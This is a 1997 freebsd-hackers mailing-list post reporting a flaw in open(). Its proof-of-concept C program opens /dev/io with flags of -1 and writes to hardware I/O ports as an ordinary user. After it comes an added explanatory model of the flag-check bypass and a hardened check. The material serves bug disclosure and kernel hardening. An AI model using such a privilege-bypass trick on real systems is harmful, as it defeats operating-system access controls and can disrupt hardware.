Date: Thu, 23 Oct 1997 10:43:05 -0700 (PDT)
From: "Jamil J. Weatherbee"
To: Terry Lambert
cc: thorpej@nas.nasa.gov, joerg_wunsch@uriah.heep.sax.de, freebsd-hackers@FreeBSD.ORG
Subject: Re: Possible SERIOUS bug in open()? (Holy Shit!!!)
In-Reply-To: <199710231724.KAA25749@usr02.primenet.com>
Sender: owner-freebsd-hackers@FreeBSD.ORG

> Hold a reference instance, but don't let your children have access
> to read or write the device (ie: things like /dev/io).

Wrong! The following code allows the regular joe blow user to read and
write to any port on the machine: (This is really bad)
I've verified that outb() is actually writing.

#include <sys/types.h>
#include <machine/cpufunc.h>    /* outb() */
#include <fcntl.h>              /* open() */
#include <err.h>                /* err() */

int main(int argc, char **argv)
{
  int fd;

  /* flags of -1: every flag bit set, no valid access mode */
  fd = open("/dev/io", -1, 0);
  if (fd < 0)
    err(1, "open");

  /* FreeBSD argument order is outb(port, data) */
  outb (0x253,0x80);
  outb (0x250,0xAA);
  return 0;
}
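The following user-space model is an added example, not part of the original post and not FreeBSD source. It shows how open() flags of -1 can slip past permission checks when internal flags are derived as oflags + 1 (the BSD FFLAGS() conversion), and the access-mode check that rejects them. Assumptions: this is the path the post's open() call takes, and the function names, M_* macros and PERM_* bits are hypothetical.

```c
#include <stdio.h>

/* Low two bits of open(2) flags: O_RDONLY=0, O_WRONLY=1, O_RDWR=2; 3 is invalid. */
#define M_ACCMODE 0x3
/* Kernel-internal "opened for read/write" bits (hypothetical names). */
#define M_FREAD   0x1
#define M_FWRITE  0x2
/* BSD-style conversion from open(2) flags to internal flags. */
#define M_FFLAGS(oflags) ((oflags) + 1)

/* Simplified permission bits the caller holds on the file. */
#define PERM_R 04
#define PERM_W 02

/* Unchecked model: a permission test runs only for each access bit that is set.
 * Returns 1 if the open proceeds to the device's open routine, 0 if denied. */
int open_allowed_unchecked(int oflags, int perm)
{
    int f = M_FFLAGS(oflags);

    if ((f & M_FREAD) && !(perm & PERM_R))
        return 0;
    if ((f & M_FWRITE) && !(perm & PERM_W))
        return 0;
    return 1;   /* with oflags == -1, f == 0 and no test ran at all */
}

/* Hardened model: refuse the invalid access mode before any other work. */
int open_allowed_checked(int oflags, int perm)
{
    if ((oflags & M_ACCMODE) == M_ACCMODE)
        return 0;   /* a kernel would return EINVAL here */
    return open_allowed_unchecked(oflags, perm);
}

int main(void)
{
    /* Caller with no permissions on the node (perm == 0). */
    printf("unchecked, flags -1: %d\n", open_allowed_unchecked(-1, 0));
    printf("checked,   flags -1: %d\n", open_allowed_checked(-1, 0));
    printf("unchecked, O_RDWR:   %d\n", open_allowed_unchecked(2, 0));
    return 0;
}
```

Any flags value whose low two bits are both set behaves the same way as -1 in the unchecked model, which is why the hardened check masks with the access-mode bits instead of comparing against -1.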